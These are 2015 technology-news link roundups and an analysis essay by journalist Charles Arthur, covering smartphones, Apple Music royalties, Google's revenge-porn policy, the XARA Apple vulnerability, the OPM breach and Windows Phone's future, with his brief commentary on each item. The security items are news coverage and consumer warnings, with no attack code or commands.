About charlesarthur

Freelance journalist - technology, science, and so on. Author of "Digital Wars: Apple, Google, Microsoft and the battle for the internet".

Start up: tracking Android, the 1998 software warning, Google’s revenge porn move, VUT Swift?, and more


Another micropayment from Amazon! Photo by Amanda Emilio on Flickr.

A selection of 8 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Android Tracker » Fiksu

In contrast to the iOS industry statistics, the Android landscape is much more fragmented, with dozens of manufacturers and thousands of devices on the market. We’ve put together four charts to help illuminate the situation:

• Android Tablet vs. Phone Usage
• Android Version Monitor
• Top Android Manufacturers
• Top Android Phones
• Top Android Tablets

The one for phone manufacturers is eye-opening, to say the least. Worth bookmarking. (Via Daniel Tello.)


BlackBerry’s Classic moment, or not » WSJ

Spencer Jakab:

Two things could leave the market pleasantly surprised on Tuesday. One would be an announcement that BlackBerry is distancing itself from handsets, devoting more resources to software. The other would be if that latter business shows signs of meeting some ambitious revenue targets laid out by chief executive John Chen.

A hopeful sign on software sales would affect the share price far more than if BlackBerry’s loss for the period through May was better than the 5 cents a share projected by analysts. They see BlackBerry reporting software and support revenue of $83m for the quarter, up from $56m a year earlier. The company wants to more than double the annual figure in fiscal 2016 to $500m and to produce operating profits on a sustained basis. That would come as services revenue continues to shrivel, falling by about half this fiscal year.

I’ll post my own forecast for BlackBerry’s results an hour or two after this post goes live. (These days people write about BlackBerry almost as a curio; it’s the Crimea of the smartphone wars.)


Launch of the new Companies House public beta service » GOV.UK

In line with the government’s commitment to free data, Companies House is pleased to announce that all public digital data held on the UK register of companies is now accessible free of charge, on its new public beta search service.

This provides access to over 170 million digital records on companies and directors including financial accounts, company filings and details on directors and secretaries throughout the life of the company.

Free access to the data is available both through a web service and an application program interface (API), enabling both consumers and technology providers to access real time updates on companies.

Fabulous. Back in 2006, the pricing was opaque and redacted.


These hackers warned the Internet would become a security disaster. Nobody listened. » The Washington Post

Craig Timberg:

Your computers, they told the panel of senators in May 1998, are not safe — not the software, not the hardware, not the networks that link them together. The companies that build these things don’t care, the hackers continued, and they have no reason to care because failure costs them nothing. And the federal government has neither the skill nor the will to do anything about it.

“If you’re looking for computer security, then the Internet is not the place to be,” said Mudge, then 27 and looking like a biblical prophet with long brown hair flowing past his shoulders. The Internet itself, he added, could be taken down “by any of the seven individuals seated before you” with 30 minutes of well-choreographed keystrokes.

The senators — a bipartisan group including John Glenn, Joseph I. Lieberman and Fred D. Thompson — nodded gravely, making clear that they understood the gravity of the situation. “We’re going to have to do something about it,” Thompson said.

What happened instead was a tragedy of missed opportunity, and 17 years later the world is still paying the price in rampant insecurity.


“Revenge porn” and search » Google Public Policy Blog

Amit Singhal, Google Search SVP:

We’ve heard many troubling stories of “revenge porn”: an ex-partner seeking to publicly humiliate a person by posting private images of them, or hackers stealing and distributing images from victims’ accounts. Some images even end up on “sextortion” sites that force people to pay to have their images removed.

Our philosophy has always been that Search should reflect the whole web. But revenge porn images are intensely personal and emotionally damaging, and serve only to degrade the victims—predominantly women. So going forward, we’ll honor requests from people to remove nude or sexually explicit images shared without their consent from Google Search results. This is a narrow and limited policy, similar to how we treat removal requests for other highly sensitive personal information, such as bank account numbers and signatures, that may surface in our search results.

In the coming weeks we’ll put up a web form people can use to submit these requests to us, and we’ll update this blog post with the link.

You could almost call it a “right to be forgotten” or “right to be delinked”. Let’s see – a person asks to have pages carrying irrelevant information about them removed from search. Which are we talking about, Europe or revenge porn?


Amazon’s new plan to pay authors every time someone turns a page » The Atlantic

Peter Wayner:

Soon, the maker of the Kindle is going to flip the formula used for reimbursing some of the authors who depend on it for sales. Instead of paying these authors by the book, Amazon will soon start paying authors based on how many pages are read—not how many pages are downloaded, but how many pages are displayed on the screen long enough to be parsed. So much for the old publishing-industry cliche that it doesn’t matter how many people read your book, only how many buy it.

For the many authors who publish directly through Amazon, the new model could warp the priorities of writing: A system with per-page payouts is a system that rewards cliffhangers and mysteries across all genres. It rewards anything that keeps people hooked, even if that means putting less of an emphasis on nuance and complexity.

So, basically, book streaming? Is Taylor Swift going to come to their aid? Or is it just an encouragement to write books at a length that people want to read? I think every author would like to know where people gave up on their books, if they didn’t finish them. Though that might not be the point at which they stopped being interested.


An Open Letter To Apple » German Association of Independent Music Companies

From 18 June, i.e. two days before Taylor Swift’s similar open letter:

Your plan not to compensate independent labels during the three-month trial period leads to the assumption that you don’t respect the music of independent artists or the work their partners do. It is obvious that this will reduce the overall income for independent artists and labels significantly at a time when many depend on every cent for survival.

Clearly what VUT needed was to rename itself “Taylor Swifte” or something. Or perhaps this was just another outgrowth of the ire felt among independent musicians. Apple Music (or more accurately the move to streaming and away from downloads) is going to cause yet another earthquake in the industry, rather like when CDs stopped being big.


Samsung’s mobile OS dilemma » Monday Note

Jean-Louis Gassée:

When we look at what it would take for Samsung to come up with its own mobile OS, the first thing to note is that “operating system” is a misnomer. Surely, iOS and Android are operating systems in the old-school “kernel” sense: They manage drivers, memory, input and output streams, user tasks, and the like. But today, an “operating system” is much more than just a kernel, it includes rich frameworks that support a wide range of applications, games, maps, social networking, productivity, drawing… Building these frameworks is a much harder task than adapting a Linux kernel.

And the OS is just the beginning. What Samsung really wants is its own ecosystem, a set of services that will ensure its autonomy, growth, and lasting importance. It wants its own app store, maps, music/video, cloud storage…

How long would it take for Samsung to build all of this? Three years, four years? Add to this the difficulty of “skating to where the puck will be”, to divine where the industry will land four years from now.

Samsung hasn’t been much good at building an ecosystem, either: look at all the content companies it has bought and then dumped, or services (ChatOn) it has started and stopped.


Start up: Swift v Apple, Beats gets heft, Aibos’ mortality, why Upworthy pivoted, and more


A number will get you into many people’s emails. Photo by Kohei314 on Flickr.

A selection of 10 links for you. I mean, do you even? I’m charlesarthur on Twitter. Observations and links welcome.

To Apple, love Taylor » Taylor Swift

Taylor Swift (yup, her):

I’m sure you are aware that Apple Music will be offering a free 3 month trial to anyone who signs up for the service. I’m not sure you know that Apple Music will not be paying writers, producers, or artists for those three months. I find it to be shocking, disappointing, and completely unlike this historically progressive and generous company.

This is not about me. Thankfully I am on my fifth album and can support myself, my band, crew, and entire management team by playing live shows. This is about the new artist or band that has just released their first single and will not be paid for its success. This is about the young songwriter who just got his or her first cut and thought that the royalties from that would get them out of debt.

This looks like an obvious one, but it isn’t. Lots of streaming services (all of them?) offer a free month initially, and the evidence suggests they don’t pay artists for those streams. (I’ve yet to confirm that absolutely.) Apple’s three-month deal seems to have come at the cost of higher royalty rates for those who sign up.

So Taylor Swift may be completely right – but that new artist or band might just want the exposure. It would certainly be good if Apple did pay in those three months. But that might then fall foul of antitrust.

Update: oh, internet, you do move fast. At 4.29am Eddy Cue tweeted that Apple would after all pay. More detail by Peter Kafka.


How It’s Made series: Beats By Dre » Medium

Avery Louie:

One of the great things about the [Beats] solo headphones is how substantial they feel. A little bit of weight makes the product feel solid, durable, and valuable. One way to do this cheaply is to make some components out of metal in order to add weight. In these headphones, 30% of the weight comes from four tiny metal parts that are there for the sole purpose of adding weight.

The two larger parts are cast zinc. Cast parts are similar to injection molded parts in that there is a tooling cost and a per-part cost. Compared to injection molding, the tool is marginally more expensive, but the per-part costs are higher, and the tools do not last as long.

The brilliant thing here is that the two large metal parts are not mirror images of each other- they are actually the same part!

The parts give them heft. And do nothing else at all.


How to hack into an email account, with just your victim’s mobile number » Graham Cluley

A bad guy – let’s call him Malcolm – is keen to break into Alice’s account, but doesn’t know her password. However, he does know Alice’s email address and phone number.

So, he visits the Gmail login page and enters Alice’s email address. But Malcolm cannot correctly enter Alice’s password of course (because he doesn’t know it).

So instead he clicks on the “Need help?” link, normally used by legitimate users who have forgotten their passwords.

Rather than choosing one of the other options, Malcolm selects “Get a verification code on my phone: [mobile phone number]” to have an SMS message containing a six-digit security code sent to Alice’s mobile phone.

This is where things get sneaky.

Because at this point, Malcolm sends Alice a text pretending to be Google.

This is very sneaky, and would probably work against lots of people. Beware.


A robotic dog’s mortality » The New York Times

Jonathan Soble on the death of the Aibo – which is running out of juice:

They didn’t shed, chew the sofa or bite the postman, but for thousands of people Sony’s Aibo robotic dog was the closest thing to a real canine companion. So when the Japanese company stopped servicing the robots last year, eight years after it ended production, owners faced a wrenching prospect: that their aging “pets” would break down for good.

Sony introduced the Aibo in 1999, at a price of 250,000 yen (about $2,000 at current exchange rates). The beaglelike robots could move around, bark and perform simple tricks. Sony sold 150,000 units through 2006; the fifth and final generation was said to be able to express 60 emotional states.


Platform Patched – The Awl

John Herrman with a great analysis of why Upworthy has been forced to pivot: because Facebook turned its unique selling point into a feature of the platform:

Upworthy was succeeding according to metrics favored by Facebook, but not necessarily by doing the things Facebook believed those metrics would cultivate. A reader might spend five minutes watching a video on Upworthy and leave satisfied, but the site neither created the video nor hosts it—it would have been created by yet another party and hosted on YouTube, a site owned by Google. For Facebook, this is fine but not optimal: Why not just embed the YouTube video directly into News Feed with the same headline and description? Better yet, why not just host the video directly on Facebook?

Facebook-native video took off with the Ice Bucket Challenge, the success of which Facebook summarized in August and later used in explaining its vision for video. Seeing opportunity, publishers started publishing more videos, and more professional videos, as soon as they could.

And here’s The Awl’s graphic of Upworthy traffic:
[Graphic: Upworthy’s falling traffic]


1Password inter-process communication: a discussion » Agile blog

Jeff Goldberg, in a long blogpost about the “malicious OSX apps could grab inter-app comms by registering to receive them first” vulnerability:

Neither we nor Luyi Xing and his team have been able to figure out a completely reliable way to solve this problem. We thank them for their help and suggestions during these discussions. But, although there is no perfect solution, there are things that can be done to make such attacks more difficult.

The blogpost goes into a lot more detail; this is a really tricky problem. Though “keep process running all the time in the background” turns out to be a good solution.


Analyzing 10 yrs (and 5TB) of OpenStreetMap » Mapsense

Many fun insights to be found, but this one will ring true for any crowdsourced effort:

Insight #3- Very few people contribute the vast majority of features

We know the OSM community is growing, but we wanted to know what the impact of that growth is on the map that we all use.  

We segmented users into the top 5% of committers and the bottom 95%.  Here’s how their edits compare:

[Chart: Open Street Map contributors]

The number of commits in the bottom 95% is growing nicely over time, but even at its peak, their commits are orders of magnitude fewer than the commits of the top 5%. These power users are incredibly prolific, often importing large swathes of data such as building outlines or roads.

These users are making a huge impact on OSM- how can we encourage more of this to accelerate OSM’s quality?


Apple vs. Samsung: Samsung asks court to reconsider appeal » San Jose Mercury News

Howard Mintz:

Samsung urged the U.S. Federal Circuit Court of Appeals to rehear the case with its full 12-judge roster, arguing that a three-judge panel erred earlier this year when it left intact a jury’s verdict that the South Korean tech giant’s smartphones and tablets infringed on Apple’s design patents.

That part of the verdict – which has been pared from an original judgment of $1bn – accounts for about $400m of the $548m in damages Samsung still must pay Apple from their first trial.

Samsung’s continued interventions make this now officially the most boring court case in history. (Thanks John Molloy for the link.)


UK private copyright exception ‘unlawful’, rules High Court » Out-law

Prior to introducing the private copying exception, the UK government argued that it did not believe the private copying exception would result in lost sales for rights holders. However, the new regime was challenged by music industry bodies. The British Academy of Songwriters, Composers and Authors (BASCA), the Musicians’ Union (MU) and UK Music claimed that the government should have to compensate them and other rights holders for the harm caused to them by the new exception.

Mr Justice Green said that the UK government was entitled to “implement a private usage exception” and to define the scope of that right. He said, though, that the government was obliged to introduce a “compensation mechanism” for rights holders if the harm caused to them by the introduction of the private copying exception was above a “de minimis level”.

Here’s the judgement. Not sure how this is going to be implemented – a surcharge on systems that can rip CDs? It’s the very definition of shutting the stable door after the horse has bolted, moved to another town, brought up foals, and died peacefully in its sleep.


Sizing up the suitors for Here, Nokia’s map business » TechCrunch

Ingrid Lunden:

One former longtime senior employee of Here estimates there are around 300 different location attributes, with corresponding historical databases, that can be tracked using Here’s technology. They include more obvious mapping and location-based applications such as driving directions and street maps, but also spatial data technology used in video and gaming applications.

“It’s incredibly difficult to get the type of mapping data that Here has. Base geometry and 20-40 road attributes are relatively easy to collect. However, to collect the 250+ attributes needed for the best navigation experience requires a combination of field teams and user-generated content,” notes entrepreneur Kurt Uhlir.

“Here has proprietary collection hardware and software that is unmatched, even by Google. Plus, they have the most extensive patent portfolio covering collecting and creating spatial content for current generation of maps and dynamic data. Here also has the foundational patents covering usage of spatial data for creating video games, movie content and the upcoming ADAS vehicle applications.”

Unmatched even by Google? Protected by patents? Such talk is heresy.


Start up: Lightning at Twitter, academic publishers strangle libraries, that iOS/OSX hack explained, and more


Do you recognise this person? Photo by Tim Dorr on Flickr.

A selection of 8 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

New smart home gadget called ELLA Assistant wants you to put down your phone » Tech In Asia

Steven Millward:

The startup team, which is based in Shanghai, sees it being used for things like telling you that you should take an umbrella, reminding you that you’re running late to an appointment, or for turning off all your smart lights at once. With a single press, it could alert your significant other that you’re leaving the house.

All that will depend on it working nicely with the brand of smart lights that you have, or syncing with the online calendar service that you use. The fact that the ELLA Assistant is subservient to your phone and other smart gadgets means it has to work with them all with ease, or it won’t gain favor with consumers. War tells Tech in Asia that the team will add support for various things as demand arises, but there are no specific supported devices or services listed yet – which is because the little gizmo hasn’t even launched. Once it’s out, it’ll have its own app store.

The ELLA Assistant will hit Kickstarter some time in August.

Hmm. Don’t think so, somehow.


This is Twitter’s top secret Project Lightning » BuzzFeed News

Mat Honan:

Project Lightning will bring event-based curated content to the Twitter platform, complete with immersive and instant-load photos and videos and the ability to embed those experiences across the Web — and even in other apps.

“It’s a brand-new way to look at tweets,” says Kevin Weil, who runs product for the company. “This is a bold change, not evolutionary.”

It is also still a few months out, and things could change. But here’s how it will work.

On Twitter’s mobile app, there will be a new button in the center of the home row. Press it and you’ll be taken to a screen that will show various events taking place that people are tweeting about. These could be based on prescheduled events like Coachella, the Grammys, or the NBA Finals. But they might also focus on breaking news and ongoing events, like the Nepalese earthquake or Ferguson, Missouri. Essentially, if it’s an event that a lot of people are tweeting about, Twitter could create an experience around it.

This likely comes out of the machine-intelligence-curated tweet streams from a company that Twitter just bought – under Costolo’s leadership, don’t forget. He just took too long to do it. (By the way, in future could “top secret” – used in the headline – please be reserved for things that actually are top secret, such as the content of the Snowden documents, and not PR-led product demos by the CEO?)


Academic publishers reap huge profits as libraries go broke » CBC News

Researchers rely on journals to keep up with the developments in their field. Most of the time, they access the journals online through subscriptions purchased by university libraries. But universities are having a hard time affording the soaring subscriptions, which are bundled so that universities effectively must pay for hundreds of journals they don’t want in order to get the ones they do.

Larivière says the cost of the University of Montreal’s journal subscriptions is now more than $7m a year  – ultimately paid for by the taxpayers and students who fund most of the university’s budget. Unable to afford the annual increases, the university has started cutting subscriptions, angering researchers.

“The big problem is that libraries or institutions that produce knowledge don’t have the budget anymore to pay for [access to] what they produce,” Larivière said.

“They could have closed one library a year to continue to pay for the journals, but then in twenty-something years, we would have had no libraries anymore, and we would still be stuck with having to pay the annual increase in subscriptions.”

The kicker: the five largest academic publishers produce 53% of scientific papers in natural and medical sciences – up from 20% in 1973. Consolidation and monopoly.


EFF and eight other privacy organizations back out of NTIA face recognition multi-stakeholder process » Electronic Frontier Foundation

Jennifer Lynch:

Despite the sensitivity of face recognition data, however, the federal government and state and local law enforcement agencies continue to build ever-larger face recognition databases. Last year the FBI rolled out its NGI biometric database with 14-million face images, and we learned through a Freedom of Information Act (FOIA) request that it plans to increase that number to 52-million images by this year. Communities such as San Diego, California are using mobile biometric readers to take pictures of people on the street or in their homes and immediately identify them and enroll them in face recognition databases. These databases are shared widely, and there are few, if any, meaningful limits on access. 

EFF has been especially concerned about commercial use of face recognition because of the possibility that the data collected will be shared with law enforcement and the federal government. Several years ago, in response to a FOIA request, we learned the FBI’s standard warrant to social media companies like Facebook seeks copies of all images you upload, along with all images you’re tagged in. In the future, we may see the FBI seeking access to the underlying face recognition data instead.

Huh. The FBI does that, does it?


Apple criticised over ‘presumptuous’ news app email » BBC News

Kevin Rawlinson:

According to Graham Hann, the head of technology, media and communications at the law firm Taylor Wessing, the terms of the deal are broadly in line with industry standards – except the requirement to opt out.

“The content of the notice is not unusual, although it has deliberately been dumbed down, possibly for clarity,” he told the BBC.

“However, the opt-out approach is very unusual and I don’t see how the notice could form a binding contract without a positive reply.

“Apple clearly wants to launch with as much content as possible and has taken this risk-based approach. Some publishers may object and even threaten to sue.

“However, I think it would be hard to claim damage beyond a reasonable royalty fee.”

Soooo… it’s not actually a big deal?


Internet TV boxes: Nvidia pips Google for Android » FT.com

Tim Bradshaw:

while [Android TV] mostly got the dictation right, it often failed to produce the results I was looking for. Asking for Breaking Bad brought up detailed information about the show and its actors, but no way to watch it. This query also produced a link to Pomodoro Wear, a countdown timer app shaped like a tomato and designed for Google’s Android Wear smartwatch platform.

Even Google itself does not seem to know quite how to use Android TV. Its marketing materials suggest asking for “romantic comedies set in New York”. But when I tried that on the Android TV itself, it produced only a list of YouTube videos, the first of which was about Lego sets from a New York toy fair. With no When Harry Met Sally or Manhattan to be found, I can only wonder whether anyone else — including Google’s own staff — has ever searched for something to watch this way.

Bear in mind that Apple experimented with the same voice dictation system for TV and, by the account in the WSJ, abandoned it.


XARA exploits on Mac, iPhone, and iPad, and what you need to know » iMore

Rene Ritchie with a series of Q+As on the vulnerability disclosed yesterday:

Q: So were the App Stores or app review tricked into letting these malicious apps in?

A: The iOS App Store was not. Any app can register a URL scheme. There’s nothing unusual about that, and hence nothing to be “caught” by the App Store review.

For the App Stores in general, much of the review process relies on identifying known bad behavior. If any part of, or all of, the XARA exploits can be reliably detected through static analysis or manual inspection, it’s likely those checks will be added to the review processes to prevent the same exploits from getting through in the future.

Apparently apps now have to state the URL schemes they will use in plaintext in a .plist file; that’s easy to review, and Apple can easily spot duplicates by static testing. Security researchers suggest Apple probably began adding such tests when it was told about the weakness – so this is perhaps already “fixed” in the simplest way it can be. (Checking plist files can be done retrospectively too.)


How useful will Google Now be? » Naofumi Kagami

With Google announcing Google Now on Tap at Google I/O 2015 and Apple announcing Proactive at WWDC 2015, there is now a lot of discussion on how useful these predictive personal assistants will be. In particular, there is a lot of discussion on how much data these personal assistants will need to collect about you, and whether these assistants need to send this data to be analysed in the cloud.

The problem I have with these arguments is that they do not go into specifics. Instead of saying “everything is going to be cool”, we should be having a detailed discussion of how each predictive recommendation is actually made, and whether each recommendation could be performed easily on your local device, or whether it needs to be done in the cloud.

I think Kagami’s question is really “What things need to be in the cloud for predictive analysis to work?” You could argue that traffic or transit news needs to be analysed in the cloud (a la Google) so it can warn you about delays; but on the other hand, an Apple device could pull that data from the cloud, and look at what’s in your device, and warn you too.

So the quest goes on.


Start up: Apple’s hacker flaw, Downing St’s FOI oddity, machines that parse art, and more


“You mean all we need to do to defeat him is adopt HTML5? Why didn’t you say?” Photo by Tom Simpson on Flickr.

A selection of 8 links for you. Uninflammable. I’m charlesarthur on Twitter. Observations and links welcome.

Encryption “would not have helped” at OPM, says DHS official » Ars Technica

Sean Gallagher:

pressed on why systems had not been protected with encryption prior to the recent discovery of an intrusion that gave attackers access to sensitive data on millions of government employees and government contractors, [US Office of Personnel Management director Katherine Archuleta] said, “It is not feasible to implement on networks that are too old.” She added that the agency is now working to encrypt data within its networks.

But even if the systems had been encrypted, it likely wouldn’t have mattered. Department of Homeland Security Assistant Secretary for Cybersecurity Dr. Andy Ozment testified that encryption would “not have helped in this case” because the attackers had gained valid user credentials to the systems that they attacked—likely through social engineering. And because of the lack of multifactor authentication on these systems, the attackers would have been able to use those credentials at will to access systems from within and potentially even from outside the network…

…nearly every question of substance about the breach—which systems were affected, how many individuals’ data was exposed, what type of data was accessed, and the potential security implications of that data—was deferred by Archuleta on the grounds that the information was classified. What wasn’t classified was OPM’s horrible track record on security, which dates back at least to the George W. Bush administration—if not further.


Serious OS X and iOS flaws let hackers steal keychain, 1Password contents » Ars Technica

Dan Goodin:

The malicious proof-of-concept apps were approved by the Apple Store, which requires all qualifying submissions to treat every other app as untrusted. Despite the supposed vetting by Apple engineers, the researchers’ apps were able to bypass sandboxing protections that are supposed to prevent one app from accessing the credentials, contacts, and other resources belonging to another app. Like Linux, Android, Windows, and most other mainstream OSes, OS X and iOS strictly limit app access for the purpose of protecting them against malware. The success of the researchers’ cross-app resource access—or XARA—attacks, raises troubling doubts about those assurances on the widely used Apple platforms.

“The consequences are dire,” they wrote in a research paper titled Unauthorized Cross-App Resource Access on MAC OS X and iOS. “For example, on the latest Mac OS X 10.10.3, our sandboxed app successfully retrieved from the system’s keychain the passwords and secret tokens of iCloud, email and all kinds of social networks stored there by the system app Internet Accounts, and bank and Gmail passwords from Google Chrome.”…

…It’s not the first time researchers have found flaws in application sandboxes. The attack exploiting WebSocket weaknesses, for instance, can also succeed in Windows under certain conditions, the researchers said. Interestingly, they said application sandboxing in Google’s Android OS was much better at withstanding XARA threats.

For the time being, the researchers told Ars, there isn’t much end users can do except wait for Apple to fix the vulnerabilities.

Bad (though not deluge-of-malware bad; instead it’s sneaky-Trojan bad). Apple was told about this in October 2014. The best hope is that this is fixed in OS X 10.11 and iOS 9, but there’s no clear indication of how hard it is to fix.


Freedom of information turns into Mission Impossible for Downing St emails » FT.com

Jim Pickard and Kiran Stacey:

Emails sent from computers in Downing Street are automatically deleted within three months under a system that makes it harder for the public to obtain answers to “freedom of information” requests, former staff have disclosed.

The system, instigated a decade ago but not widely known about, means that messages are only held beyond that period if an individual saves them. It is widely blamed by government advisers for what one former employee called a sometimes “dysfunctional” operation at the heart of Whitehall.

The email system was introduced under the Labour government in late 2004, just weeks before January 2005 when the Freedom of Information Act belatedly came into force.

“The timing of this very strongly indicates that it was not a coincidence,” said Maurice Frankel, director of the UK Campaign for Freedom of Information.

Gee, ya think?


China and Russia almost definitely have the Snowden docs » WIRED

Bruce Schneier (who is a veritable security expert; if he says it, it’s true):

The vulnerability is not Snowden; it’s everyone who has access to the files.

First, the journalists working with the documents. I’ve handled some of the Snowden documents myself, and even though I’m a paranoid cryptographer, I know how difficult it is to maintain perfect security. It’s been open season on the computers of the journalists Snowden shared documents with since this story broke in July 2013. And while they have been taking extraordinary pains to secure those computers, it’s almost certainly not enough to keep out the world’s intelligence services…

…In general, it’s far easier to attack a network than it is to defend the same network. This isn’t a statement about willpower or budget; it’s how computer and network security work today. A former NSA deputy director recently said that if we were to score cyber the way we score soccer, the tally would be 462–456 twenty minutes into the game.

Even airgapped, never-connected computers can be attacked (don’t ask me how). The Guardian took extraordinary pains with its London copy: two people needed to enter passwords, at least two people needed to be present when documents were read, the computers used had never been online and had no connection.

But a simpler thought is this: if Snowden was one of 10,000 or so NSA staff with access to that data (and more in the UK), what are the chances that absolutely none of those has somehow been coerced or willingly turned over data to foreign powers? Pretty much zero.


Flash will soon be obsolete: it’s time for agencies to adapt » Advertising Age

David Evans on the fact that major browsers on desktop are hurrying to dump Flash:

If this sounds like a big problem to you, you’re absolutely right. If the major browsers were to disable Flash immediately, we could be looking at a scenario where roughly 84% of banners across the internet would not be viewable on desktop browsers. Rather than clicking on a visually dynamic, animated ad created to capture attention with movement and video, users would instead see a static banner in place of the intended ad, and most advertising creatives don’t pay much attention to the creation of static backups.

For advertisers, this could mean shelling out first-class money for economy-class impressions.

Though it might be painful to admit for an industry that has relied on Flash for over a decade, the right choice is to start creating desktop ads in the HTML5 language used to create ads for mobile.

This is a bit obvious to anyone who’s been paying attention for the past three years (minimum), but perhaps advertising has been looking somewhere else.


Market Monitor Q1 2015: LATAM smartphones grow 25% annually » Counterpoint Technology

Tina Lu:

LATAM is third, behind North America and Europe in the global ranking of smartphone shipment penetration.

• Except for Peru, majority of the key LATAM markets are seeing a significantly higher smartphone demand, with shipment penetration of total handsets between 77% and 99%.

• Overall feature phone demand has been declining, and so has been the overall scale and profitability of manufacturing and selling them. As a result, in countries like Argentina, due to government protectionist measures and import restrictions, vendors are manufacturing and selling only the more profitable smartphones. This has led to smartphone shipment penetration of sales to reach 99%; the highest in the region.

Here’s the shipment figure: Latam smartphone shipments Q1 2015

If you do the maths, on a 25% yoy growth both Samsung’s and LG’s shipments actually fell; Apple’s more than doubled. Alcatel and “Others” both grew faster than the market.


Apple’s Siri, Spotlight extend Google-like search inside iOS 9 apps, without tracking users » Apple Insider

Daniel Eran Dilger:

Because Apple is indexing in-app content for its search results, it can more easily suppress “Search Engine Optimization” malicious content or link spamming, as relevancy is tied to user engagement. If few users find a search result worthwhile, it can fade from relevance.

Many of the new search-related features Apple debuted for iOS 9 and OS X El Capitan bear a strong resemblance to some of predictive search features first introduced by Google starting back in 2012 as part of Android 4.1, branded as “Google Now.”

Since then, Google has introduced “app indexing,” a related feature designed to make the company’s web-style search more relevant to mobile users by delivering results that can open within local apps. For example, a recipe might open within a cookbook app, rather than just presenting the same information on a web page or dumping users into the app to find the recipe on their own.

The most profound difference between the two companies’ approach to in-app search is that Apple does not monetize its search with ads, and therefore has no need to capture and store users’ data and behaviors for future profiling, tied to a persistent user and device identifier that individuals can’t easily remove.

Apple is perhaps two years behind Google on this – but most people are using a version of Android that is at least two years old (87% are using 4.4, KitKat, from November 2013, or earlier). Which means that by November or so, Apple will roughly have parity on this feature.


Machine vision algorithm chooses the most creative paintings in history » MIT Technology Review

The job of distinguishing the most creative from the others falls to art historians. And it is no easy task. It requires, at the very least, an encyclopedic knowledge of the history of art. The historian must then spot novel features and be able to recognize similar features in future paintings to determine their influence.

Those are tricky tasks for a human and until recently, it would have been unimaginable that a computer could take them on. But today that changes thanks to the work of Ahmed Elgammal and Babak Saleh at Rutgers University in New Jersey, who say they have a machine that can do just this.

machine vision view of art

They’ve put it to work on a database of some 62,000 pictures of fine art paintings to determine those that are the most creative in history. The results provide a new way to explore the history of art and the role that creativity has played in it.

Can’t be long before someone puts a human art historian up against the machine to see who spots the fake. (By the way, there was no byline I could find on the story. Maybe a robot wrote it.)


Windows Phone: Microsoft’s really good reason to keep it going isn’t about phones


Important equations. Photo by the waving cat on Flickr.

The abrupt departure of Stephen Elop as leader of the hardware devices business at Microsoft, which will instead be united under Terry Myerson, creates a big, obvious question: is Microsoft about to kill the Lumia smartphone business that it bought from Nokia for $9bn?

Let’s go through the arguments for and against.

Kill it because: the Windows Phone business loses money hand over fist – no phone maker, including Nokia, has ever managed to make it profitable. My analysis of its financials suggests that in Q1 it was losing around $40 per handset even if you assumed that featurephones made zero profit. Even assuming a loss per featurephone, the calendar Q1 (fiscal Q3) figures still showed a $29 per handset loss, even with generous assumptions about marketing and ignoring goodwill writeoffs.

And Microsoft has warned that it’s going to take a whacking loss pretty soon on the phones division. The logical time to do that is at the end of the fiscal year – which is two weeks from now. Elop’s leaving just means the mess is already cleaned up when Satya Nadella goes on the analyst call.

Other handset makers simply won’t touch Windows Phone; they know they can’t make money from it. Huawei’s consumer marketing chief famously said last September that it wasn’t worth doing.

In addition, the number of Windows Phone users worldwide is really small in the context of the whole business. Out of more than 2 billion connected smartphone users, around 80m use Windows Phone – and the majority of those are using low-end versions.

Why do they primarily use low-end phones? Because they’re not worried about apps, and that’s fine, because Windows Phone hasn’t managed to attract app developers to any great extent – it’s very much a distant third (or even fourth) for development.

So Windows Phone has no momentum, is a money pit, and nobody’s interested in it – not the users or developers.

Now we come to the reasons to keep it.

Keep it because: Microsoft has to have a play in mobile because mobile is the biggest computing platform on the planet, bar none. Mobile is essential; if you aren’t in that, you simply aren’t in the game. True, Microsoft is writing software for rival platforms (sometimes before it does for Windows Phone itself) but to get any idea of the challenges and advances of what’s happening in the mobile world, you have to be a player yourself. Being exposed to the harsh vicissitudes of the market, and its demands, shows you what it is that people want and need much more immediately than if you’re trying to figure it out at second hand by observing Apple’s or Google’s manoeuvres with their operating systems.

Not only that, but mobile is an intermediate stepping stone between the desktop and the coming internet of things – which you could call sub-mobile. IoT depends on components that have become pervasive through their use in smartphones (GPS, accelerometers, camera sensors, fingerprint sensors, barometers…) and understanding how their capabilities interact, and fuse, and how their price points vary, is essential to seeing what the world is going to look like in five years’ time.

That’s what I see as a subtext in the announcement about the reorganisation of the “devices” side:

Executive Vice President Terry Myerson will lead a newly formed team, Windows and Devices Group (WDG), focused on enabling more personal computing experiences powered by the Windows ecosystem. This new team combines the engineering efforts of the current Operating Systems Group and Microsoft Devices Group.

“More personal computing experiences”? That’s “more personal” as in “closer to the person”, I think, rather than “more things that are PC”. (Update: to clarify, for those it isn’t clear to, I take that to mean things like Hololens – which relies heavily on accelerometers and real-time tracking and lens technology – and wearables. You don’t get much closer to the person than screens a few centimetres from your face and something that’s actually next to your skin.)

So what now?

Even to a Windows Phone sceptic like me (even though I really liked its interface when I first encountered it), it’s obvious that the second argument is by far the stronger one. It would be different if Microsoft couldn’t bear the cost of losses on Windows Phone (if it were, say, HTC), but the fact is that it can. It can bear those losses pretty much endlessly.

Logically, therefore, this is going to happen:
• Microsoft is going to announce a whacking loss on the phones business, which will be merged into the Devices business, at the end of this quarter
• the Lumia business will continue to tick over, functioning essentially as an R+D department for future IoT devices – note how Microsoft killed the proposed Nokia smartwatch in favour of its own Band
• Windows Phone will continue to sell poorly, and lose money, but it won’t matter. For Microsoft, mobile is now a lost battle; it’s moving on to the next thing. Are you ready for the platform battle of the internet of things?

Start up: Grexit to bitcoin?, Google’s antitrust deadline, Merkel’s suspect PC, Samsung security hole and more


Stockpiled – a bit like HTC’s unsold phones. Photo by .dh on Flickr.

A selection of 7 links for you. Use them wisely. I’m charlesarthur on Twitter. Observations and links welcome.

Bitcoin surges as Grexit worries mount, posts best run in 18 months » Reuters

Jemima Kelly:

Joshua Scigala, co-founder of Vaultoro.com, a firm that holds bitcoin for its customers and allows them to exchange it for gold and vice versa, said that Greeks were buying the currency as their trust in the authorities waned. It is also unclear what currency would be used if a Grexit does occur — another potential factor driving Greek demand for bitcoin.

“Some people aren’t waiting for the government to figure out an exit plan and are doing it for themselves,” said Scigala.

“You have people worrying about their families’ wealth or their life savings, and worrying that their money might be locked up in banks … They’d rather hold money in a private asset like gold or bitcoin.”

